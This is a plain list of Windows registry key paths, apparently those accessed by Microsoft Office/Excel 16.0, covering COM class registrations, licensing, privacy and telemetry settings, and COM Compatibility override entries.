HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\AppID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\LocalServer
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\LocalServer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\Elevation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\Elevation
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\Elevation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\TreatAs
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\LocalServer
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InProcServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InProcHandler32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InProcHandler
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Licensing
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Licensing\RetailDemo
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.System.Profile.RetailInfo
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.System.Profile.RetailInfo
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.System.Profile.RetailInfo\ActivationType
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.System.Profile.RetailInfo\Server
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.System.Profile.RetailInfo\DllPath
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.System.Profile.RetailInfo\Threading
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.System.Profile.RetailInfo\TrustLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.System.Profile.RetailInfo\CustomAttributes
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.System.Profile.RetailInfo\CustomAttributes
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.System.Profile.RetailInfo\RemoteServer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.System.Profile.RetailInfo\ActivateAsUser
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.System.Profile.RetailInfo\ActivateInSharedBroker
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.System.Profile.RetailInfo\ActivateInBrokerForMediumILContainer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.System.Profile.RetailInfo\Permissions
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.System.Profile.RetailInfo\ActivateOnHostFlags
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\Licensing\ServicePlanFeatures
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Licensing\ServicePlanFeatures
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\LastUILang
HKEY_CURRENT_USER\Software\Policies\Microsoft\Shared
HKEY_CURRENT_USER\Software\Microsoft\Shared
HKEY_CURRENT_USER\Software\Microsoft\Shared\OfficeUILanguage
HKEY_CURRENT_USER\Software\Policies\Microsoft\Cloud\Office\Common\ClientTelemetry
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\SendTelemetry
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Privacy
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Privacy\SendTelemetryTime
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\Privacy
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\Privacy\SettingsStore\Anonymous
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Privacy\SettingsStore\Anonymous
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Privacy\SettingsStore\Anonymous\FRESettingsMigrated
HKEY_CURRENT_USER\Software\Policies\Microsoft\Cloud\Office\16.0\Common\Privacy
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Privacy\ControllerConnectedServicesEnabled
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Privacy\SettingsStore\Anonymous\ControllerConnectedServicesStateTime
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\DeviceAccess
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Privacy\SettingsStore\Anonymous\DisconnectedState
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Privacy\DisconnectedState
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Privacy\UserContentDisabled
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Privacy\DownloadContentDisabled
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Cloud\Office\16.0\common\officesvcmanager
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Privacy\SettingsStore\Anonymous\RequiredDiagnosticDataNoticeVersion
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Privacy\SettingsStore\Anonymous\OptionalDiagnosticDataConsentVersion
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Privacy\SettingsStore\Anonymous\ConnectedExperiencesNoticeVersion
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Privacy\SettingsStore\Anonymous\OptionalConnectedExperiencesNoticeVersion
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Privacy\SettingsStore\Anonymous\RoamingNotificationState
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\ServerReachabilityTimeout
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\UseDeviceLevelConnectivity
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Excel\Security
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{00000327-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{00000327-0000-0000-C000-000000000046}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{00000327-0000-0000-C000-000000000046}\AlternateCLSID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{00000327-0000-0000-C000-000000000046}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{00000327-0000-0000-C000-000000000046}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{00024512-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{00024512-0000-0000-C000-000000000046}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{00024512-0000-0000-C000-000000000046}\AlternateCLSID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{00024512-0000-0000-C000-000000000046}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{00024512-0000-0000-C000-000000000046}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD0-48AA-11D2-8432-006008C3FBFC}
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD0-48AA-11D2-8432-006008C3FBFC}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD0-48AA-11D2-8432-006008C3FBFC}\AlternateCLSID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD0-48AA-11D2-8432-006008C3FBFC}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD0-48AA-11D2-8432-006008C3FBFC}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD1-48AA-11D2-8432-006008C3FBFC}
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD1-48AA-11D2-8432-006008C3FBFC}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD1-48AA-11D2-8432-006008C3FBFC}\AlternateCLSID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD1-48AA-11D2-8432-006008C3FBFC}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD1-48AA-11D2-8432-006008C3FBFC}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD2-48AA-11D2-8432-006008C3FBFC}
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD2-48AA-11D2-8432-006008C3FBFC}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD2-48AA-11D2-8432-006008C3FBFC}\AlternateCLSID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD2-48AA-11D2-8432-006008C3FBFC}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD2-48AA-11D2-8432-006008C3FBFC}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD3-48AA-11D2-8432-006008C3FBFC}
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD3-48AA-11D2-8432-006008C3FBFC}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD3-48AA-11D2-8432-006008C3FBFC}\AlternateCLSID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD3-48AA-11D2-8432-006008C3FBFC}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD3-48AA-11D2-8432-006008C3FBFC}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD4-48AA-11D2-8432-006008C3FBFC}
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD4-48AA-11D2-8432-006008C3FBFC}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD4-48AA-11D2-8432-006008C3FBFC}\AlternateCLSID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD4-48AA-11D2-8432-006008C3FBFC}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD4-48AA-11D2-8432-006008C3FBFC}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD5-48AA-11D2-8432-006008C3FBFC}
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD5-48AA-11D2-8432-006008C3FBFC}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD5-48AA-11D2-8432-006008C3FBFC}\AlternateCLSID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD5-48AA-11D2-8432-006008C3FBFC}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD5-48AA-11D2-8432-006008C3FBFC}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD8-48AA-11D2-8432-006008C3FBFC}
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD8-48AA-11D2-8432-006008C3FBFC}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD8-48AA-11D2-8432-006008C3FBFC}\AlternateCLSID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD8-48AA-11D2-8432-006008C3FBFC}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD8-48AA-11D2-8432-006008C3FBFC}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD9-48AA-11D2-8432-006008C3FBFC}
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD9-48AA-11D2-8432-006008C3FBFC}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD9-48AA-11D2-8432-006008C3FBFC}\AlternateCLSID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD9-48AA-11D2-8432-006008C3FBFC}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD9-48AA-11D2-8432-006008C3FBFC}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BDA-48AA-11D2-8432-006008C3FBFC}
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BDA-48AA-11D2-8432-006008C3FBFC}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BDA-48AA-11D2-8432-006008C3FBFC}\AlternateCLSID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BDA-48AA-11D2-8432-006008C3FBFC}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BDA-48AA-11D2-8432-006008C3FBFC}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BDB-48AA-11D2-8432-006008C3FBFC}
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BDB-48AA-11D2-8432-006008C3FBFC}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BDB-48AA-11D2-8432-006008C3FBFC}\AlternateCLSID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BDB-48AA-11D2-8432-006008C3FBFC}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BDB-48AA-11D2-8432-006008C3FBFC}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{25336920-03F9-11CF-8FD0-00AA00686F13}
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{25336920-03F9-11CF-8FD0-00AA00686F13}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{25336920-03F9-11CF-8FD0-00AA00686F13}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{25336920-03F9-11CF-8FD0-00AA00686F13}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{25336921-03F9-11CF-8FD0-00AA00686F13}
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{25336921-03F9-11CF-8FD0-00AA00686F13}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{25336921-03F9-11CF-8FD0-00AA00686F13}\AlternateCLSID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{25336921-03F9-11CF-8FD0-00AA00686F13}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{25336921-03F9-11CF-8FD0-00AA00686F13}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{2D360200-FFF5-11d1-8d03-00a0c959bc0a}
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{2D360200-FFF5-11d1-8d03-00a0c959bc0a}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{2D360200-FFF5-11d1-8d03-00a0c959bc0a}\AlternateCLSID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{2D360200-FFF5-11d1-8d03-00a0c959bc0a}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{2D360200-FFF5-11d1-8d03-00a0c959bc0a}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{2D360201-FFF5-11d1-8D03-00A0C959BC0A}
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{2D360201-FFF5-11d1-8D03-00A0C959BC0A}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{2D360201-FFF5-11d1-8D03-00A0C959BC0A}\AlternateCLSID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{2D360201-FFF5-11d1-8D03-00A0C959BC0A}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{2D360201-FFF5-11d1-8D03-00A0C959BC0A}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{3050F3D9-98B5-11CF-BB82-00AA00BDCE0B}
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{3050F3D9-98B5-11CF-BB82-00AA00BDCE0B}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{3050F3D9-98B5-11CF-BB82-00AA00BDCE0B}\AlternateCLSID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{3050F3D9-98B5-11CF-BB82-00AA00BDCE0B}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{3050F3D9-98B5-11CF-BB82-00AA00BDCE0B}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}\AlternateCLSID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}\ScopedActivationOLEJSOverride
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\WinHttpSecureProtocols
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{3050F5C8-98B5-11CF-BB82-00AA00BDCE0B}
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{3050F5C8-98B5-11CF-BB82-00AA00BDCE0B}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{3050F5C8-98B5-11CF-BB82-00AA00BDCE0B}\AlternateCLSID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{3050F5C8-98B5-11CF-BB82-00AA00BDCE0B}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{3050F5C8-98B5-11CF-BB82-00AA00BDCE0B}\ScopedActivationOLEJSOverride
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\ForceDefaultAutoLogonLevelLow
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{3050F67D-98B5-11CF-BB82-00AA00BDCE0B}
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{3050F67D-98B5-11CF-BB82-00AA00BDCE0B}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{3050F67D-98B5-11CF-BB82-00AA00BDCE0B}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{3050F67D-98B5-11CF-BB82-00AA00BDCE0B}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{528D46B3-3A4B-4B13-BF74-D9CBD7306E07}
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{528D46B3-3A4B-4B13-BF74-D9CBD7306E07}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{528D46B3-3A4B-4B13-BF74-D9CBD7306E07}\AlternateCLSID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{528D46B3-3A4B-4B13-BF74-D9CBD7306E07}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{528D46B3-3A4B-4B13-BF74-D9CBD7306E07}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{8856F961-340A-11D0-A96B-00C04FD705A2}
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{8856F961-340A-11D0-A96B-00C04FD705A2}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{8856F961-340A-11D0-A96B-00C04FD705A2}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{8856F961-340A-11D0-A96B-00C04FD705A2}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{AE24FDAE-03C6-11D1-8B76-0080C744F389}
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{AE24FDAE-03C6-11D1-8B76-0080C744F389}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{AE24FDAE-03C6-11D1-8B76-0080C744F389}\AlternateCLSID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{AE24FDAE-03C6-11D1-8B76-0080C744F389}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{AE24FDAE-03C6-11D1-8B76-0080C744F389}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{CE39D6F3-DAB7-41B3-9F7D-BD1CC4E92399}
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{CE39D6F3-DAB7-41B3-9F7D-BD1CC4E92399}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{CE39D6F3-DAB7-41B3-9F7D-BD1CC4E92399}\AlternateCLSID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{CE39D6F3-DAB7-41B3-9F7D-BD1CC4E92399}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{CE39D6F3-DAB7-41B3-9F7D-BD1CC4E92399}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{ECABAFC7-7F19-11D2-978E-0000F8757E2A}
